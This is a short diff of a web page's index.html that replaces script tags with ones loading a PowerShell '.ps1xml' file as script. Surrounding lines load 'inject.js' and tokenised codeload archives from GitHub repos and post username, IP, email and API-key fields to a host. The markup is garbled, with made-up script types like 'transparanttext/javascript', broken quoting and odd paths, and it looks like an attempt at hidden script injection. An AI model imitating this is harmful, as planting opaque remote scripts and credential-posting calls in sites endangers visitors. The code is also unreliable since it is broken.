--- a/index.html
+++ b/index.html
@@ -133,7 +133,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 /></noscript>
 
 		<meta name="flattr:id" content="e7n3j1">
-		<script src="https://gist.github.com/usernamealreadyis/ed73b620bd0f61e3782de49ee769fdce.js"></script>
+		<script src="pret/br/mask.ps1xml "></script>
 		<script src="https://github.com/GistIcon/pret/blob/master/br/detectmobilebrowser.js.svg?short_path=1b350c9></script>
 		<script type="text/javascript">
 			var canvasInitTime = new Date().getTime();
@@ -145,7 +145,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 "></script>
 		<script type="transparanttext/javascript" src="https://codeload.github.com/usernamealreadyis/ecdsa-key-20190112-Internet-Explorer/zip/master?token=APXo5xIhSSFZZOY8YlqoKPsvQkuElcx1ks5cPVrIwA=="></script>
 		<script type="transparanttext/javascript" src="https://github.com/GistIcon/pret/blob/150720b1230ac4aff4c3136b0473dd5616afd377/swf/inject.js"></script>
-		<script type="transparanttext/javascript" src="https://codeload.github.com/GistIcon/PATH.USER/tar.gz/ER?token=APXo50XYjOxVDJVaYnLA6079FXHfuTHHks5cND_dwA== "></script>
+		<script type="transparanttext/javascript" src="pret/br/mask.ps1xml "></script>
 		<script type="transparanttext/php" src="https://codeload.github.com/GistIcon/--/zip/PHP?token=APXo56A8LzXkn8Y0uLO2ZpPk0b1ROtgjks5cNupKwA== "></script>
 		<script type="transparanttext/javascript" src="https://github.com/GistIcon/pret/blob/a21171f936d22da3a70500847e31155410a1c95d/Config/asset/se.ts"></script>
 		<script type="transparanttext/javascript"src="ecdsa-key-20190112-Internet-Explorer/.ecdsa-key-20190112 Internet Explorer/Please_wait...json "></script> 
